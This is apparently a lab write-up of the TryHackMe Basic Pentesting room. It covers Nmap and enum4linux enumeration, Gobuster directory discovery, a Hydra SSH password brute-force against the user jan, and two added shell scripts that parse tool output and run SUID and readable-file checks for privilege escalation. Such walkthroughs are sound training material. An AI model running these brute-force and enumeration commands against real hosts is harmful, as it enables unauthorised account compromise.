TryHackMe | Basic Pentesting | Walkthrough

Basic Pentesting Write-Up

This write-up walks through the TryHackMe Basic Pentesting room, which covers web application testing and privilege escalation. It gives a step-by-step guide to deploying the machine, enumerating the exposed services, finding hidden directories, recovering usernames from SMB, and brute-forcing a password for one of those users.


Summary of Key Steps:

1. Deploy the Machine

  • Connect to the TryHackMe network with the OpenVPN configuration file from your account, and confirm the tunnel is up (the tun0 interface has an address) before scanning.
  • If you have not connected before, follow the TryHackMe help page on setting up the VPN.

2. Service Enumeration with Nmap

Run the following scan to discover open ports and identify the services behind them. The results are saved to webapp_basic.txt so they can be re-read in later steps without rescanning:

nmap -sV -sC -Pn -oN webapp_basic.txt [webappIP]
  • -sV: Probes open ports to identify service names and versions.
  • -sC: Runs the default NSE script set (the same as --script=default). These scripts mainly collect extra service information such as HTTP titles, SSH host keys and SMB details; they are not a vulnerability scan.
  • -Pn: Skips host discovery and treats the target as up, which matters over the VPN, where ICMP probes are often dropped.
  • -oN: Writes normal, human-readable output to the named file for reference.

Nmap Results:


PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu
80/tcp   open  http        Apache httpd 2.4.18
139/tcp  open  netbios-ssn Samba smbd
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7

3. Enumerate SMB Shares

Use enum4linux to enumerate the Samba service (users, shares, password policy and OS information) and keep the output, since a later step relies on it:

enum4linux -a [webappIP] > enum.txt

The -a switch runs all of the tool's simple enumeration checks; the user list it recovers is what step 5 uses.

4. Hidden Directory Discovery

Identify hidden directories with Gobuster. The scan below targets the Apache instance on port 80; the Tomcat instance on port 8080 from the Nmap results is a second web root that deserves the same treatment:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://[webappIP]

Output:

/development (Status: 301)

Navigating to /development reveals two text files:

  • dev.txt: a developer note that refers to Apache Struts and to the SMB configuration.
  • j.txt: a note stating that the user jan has a weak password.

5. Username Enumeration

The users section of the enum4linux output lists two local accounts, which gives us the username list for the next step:

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

6. Password Brute-Forcing with Hydra

Brute-force the SSH password for the user jan with Hydra. -l sets the single username and -P the password list; -t 4 limits the number of parallel connections, because OpenSSH's default MaxStartups setting causes higher task counts to have connections dropped and valid passwords missed (Hydra itself prints a warning recommending -t 4 for SSH):

hydra -l jan -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt -t 4 [webappIP] ssh

Output:

[22][ssh] host: [webappIP]   login: jan   password: [password]
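
The steps above each produce a file whose contents feed the next step. The script below is an added example, not part of the original write-up: it parses the saved Nmap, enum4linux and Hydra output offline and turns it into the inputs for the following tool (Gobuster targets for every web service, a username file for hydra -L, and the recovered credentials). The three sample files are constructed inline to mirror the output shown above; 10.10.10.10 stands in for [webappIP] and the password in the Hydra line is a placeholder, not a real result.

```shell
#!/bin/sh
# Added example, not taken from the original write-up: turn the saved tool
# output from steps 2, 3 and 6 into inputs for the following step, offline.
# The three sample files are constructed here to mirror the output shown in
# the walkthrough; 10.10.10.10 stands in for [webappIP] and the password in
# the Hydra line is a placeholder, not a real result.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Constructed sample: nmap -oN output (step 2).
cat > "$WORK/webapp_basic.txt" <<'EOF'
Nmap scan report for 10.10.10.10
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu
80/tcp   open  http        Apache httpd 2.4.18
139/tcp  open  netbios-ssn Samba smbd
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
EOF

# Constructed sample: the users section of enum4linux -a output (step 3).
cat > "$WORK/enum.txt" <<'EOF'
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
EOF

# Constructed sample: a Hydra success line (step 6); the password is a placeholder.
cat > "$WORK/hydra.txt" <<'EOF'
[22][ssh] host: 10.10.10.10   login: jan   password: placeholder
EOF

# open_ports FILE: "port/proto service" for every open port in an -oN file.
open_ports() {
  awk '$2 == "open" { print $1, $3 }' "$1"
}

# http_ports FILE: only the open ports whose service is http-like, as bare
# port numbers; these are the ones worth pointing Gobuster at.
http_ports() {
  awk '$2 == "open" && $3 ~ /^http/ { sub("/tcp", "", $1); print $1 }' "$1"
}

# gobuster_targets HOST FILE: one base URL per open HTTP service.
gobuster_targets() {
  http_ports "$2" | while read -r port; do
    printf 'http://%s:%s\n' "$1" "$port"
  done
}

# smb_users FILE: local usernames from enum4linux's "Unix User" SID lines.
smb_users() {
  sed -n 's/^S-1-22-1-[0-9]* Unix User\\\(.*\) (Local User)$/\1/p' "$1"
}

# hydra_creds FILE: "login:password" for every successful Hydra line.
hydra_creds() {
  awk '/^\[[0-9]+\]\[[a-z]+\] host:/ {
         for (i = 1; i <= NF; i++) {
           if ($i == "login:")    l = $(i + 1)
           if ($i == "password:") p = $(i + 1)
         }
         print l ":" p
       }' "$1"
}

# Feed the enumeration results forward: a username file for hydra -L and
# one Gobuster target per web service rather than only port 80.
smb_users "$WORK/enum.txt" > "$WORK/users.txt"

echo "Open ports:";             open_ports "$WORK/webapp_basic.txt"
echo "Gobuster targets:";       gobuster_targets 10.10.10.10 "$WORK/webapp_basic.txt"
echo "Usernames for hydra -L:"; cat "$WORK/users.txt"
echo "Credentials found:";      hydra_creds "$WORK/hydra.txt"
```

On the real target, point the functions at the files the tools actually wrote (webapp_basic.txt, enum.txt, and Hydra's output redirected to a file). The generated users.txt lets hydra -L test every enumerated account instead of only jan, and the Gobuster target list makes sure the Tomcat instance on 8080 is not forgotten.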

7. Privilege Escalation

  • Log in as jan over SSH with the recovered password and run sudo -l to see which commands, if any, the account may run with elevated rights.
  • Enumerate the local system for the usual escalation vectors: SUID binaries (find / -perm -4000 -type f 2>/dev/null), writable files in system paths, cron jobs and running services.
  • Check the home directory of the other account enum4linux found (kay) for files that jan can read. Material another user has left world-readable often provides the foothold on that account, and from there the route to root.
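
The local checks from this step, as an added example that is not part of the original write-up. The functions take a root directory so they can be exercised here against a small directory tree constructed inline (two home directories, a private and a world-readable file in each, and a fake setuid binary beside an ordinary one); on the box itself they would be run as suid_files / and readable_in_other_homes / jan.

```shell
#!/bin/sh
# Added example, not taken from the original write-up: the local checks from
# step 7 as functions that take a root directory, so they can be exercised
# against the constructed tree below and then run on the real box as
# suid_files / and readable_in_other_homes / jan.
set -eu

# suid_files ROOT: regular files below ROOT with the setuid bit set.
suid_files() {
  find "$1" -type f -perm -4000 2>/dev/null
}

# readable_in_other_homes ROOT USER: world-readable regular files in home
# directories other than USER's own (the check to run as jan once enum4linux
# has shown that a second account, kay, exists).
readable_in_other_homes() {
  find "$1/home" -mindepth 2 -type f -perm -004 ! -path "$1/home/$2/*" 2>/dev/null
}

# sudo_rights: commands the current account may run via sudo, asked for
# non-interactively (what sudo -l answers), with a clear message if sudo is
# absent or would need a password.
sudo_rights() {
  if command -v sudo >/dev/null 2>&1; then
    sudo -n -l 2>/dev/null || echo "sudo -l: a password is required or sudo is denied"
  else
    echo "sudo is not installed"
  fi
}

# Constructed tree standing in for the target's filesystem.
DEMO="$(mktemp -d)"
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/home/jan" "$DEMO/home/kay" "$DEMO/usr/bin"
for u in jan kay; do
  printf 'notes\n'  > "$DEMO/home/$u/readme.txt";  chmod 644 "$DEMO/home/$u/readme.txt"
  printf 'secret\n' > "$DEMO/home/$u/private.txt"; chmod 600 "$DEMO/home/$u/private.txt"
done
printf '#!/bin/sh\n' > "$DEMO/usr/bin/tool";     chmod 755  "$DEMO/usr/bin/tool"
printf '#!/bin/sh\n' > "$DEMO/usr/bin/suidtool"; chmod 4755 "$DEMO/usr/bin/suidtool"

echo "setuid binaries:";           suid_files "$DEMO"
echo "readable in others' homes:"; readable_in_other_homes "$DEMO" jan
echo "sudo rights:";               sudo_rights
```

Against the constructed tree, only suidtool and kay's readme.txt are reported as jan: the mode-bit checks are what matter, so the same functions give the same answers whether you run them as a low-privileged user on the target or as yourself on a copy of the filesystem.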

Tools Used:

  • Nmap: For network scanning and service detection.
  • enum4linux: For SMB enumeration.
  • Gobuster: For directory brute-forcing.
  • Hydra: For password brute-forcing.

This guide gives a structured approach to the Basic Pentesting room and covers the essential steps of web application testing and privilege escalation: service enumeration, SMB enumeration, directory discovery, password brute-forcing and local enumeration once a shell is obtained.
